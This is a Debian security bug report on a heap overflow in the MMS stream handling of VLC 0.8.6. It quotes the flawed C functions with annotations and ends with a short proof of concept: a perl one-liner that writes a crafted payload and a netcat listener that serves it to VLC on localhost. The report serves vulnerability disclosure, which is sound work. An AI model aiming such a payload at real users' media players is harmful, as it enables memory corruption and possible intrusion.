Package: vlc Version: 0.8.6.i-1 Severity: grave Tags: security Hi, the following security issue was published for vlc
static int mms_ReceiveCommand( access_t *p_access )
{
access_sys_t *p_sys = p_access->p_sys;
for( ;; )
{
int i_used;
int i_status;
if( NetFillBuffer( p_access ) < 0 )
{
msg_Warn( p_access, "cannot fill buffer" );
return VLC_EGENERIC;
}
if( p_sys->i_buffer_tcp > 0 )
{
[1] i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp,
p_sys->i_buffer_tcp, &i_used );
[2] if( i_used < MMS_BUFFER_SIZE )
{
[3] memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used,
MMS_BUFFER_SIZE - i_used ); //BUG! i_used overflow
(...)
[1] - function that sets i_used to negative value, see below
[2] - i_used is signed, so predicate is true
[3] - actual overflow, we have good control over what is written
static int mms_ParseCommand( access_t *p_access,
uint8_t *p_data,
int i_data,
int *pi_used )
(...)
i_length = GetDWLE( p_data + 8 ) + 16;
(...)
if( i_length > p_sys->i_cmd )
{
msg_Warn( p_access,
"truncated command (missing %d bytes)",
i_length - i_data );
p_sys->i_command = 0;
return -1;
}
[1] else if( i_length < p_sys->i_cmd )
{
p_sys->i_cmd = i_length;
[2] *pi_used = i_length;
}
(...)
[1] - predicate is true
[2] - sets i_used from mms_ReceiveCommand
- - Proof of concept -
on localhost:
perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot
nc -l -v -p 1755 < headshot
open this url in VLC:
mmst://127.0.0.1/
I can confirm this issue exists.
Please see http://www.orange-bat.com/adv/2008/adv.08.24.txt for the original
advisory.
I'll follow up on this bug report with a CVE id soon.
Kind regards
Nico
--
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
pgp8BniXmGCQv.pgp
Description: PGP signature
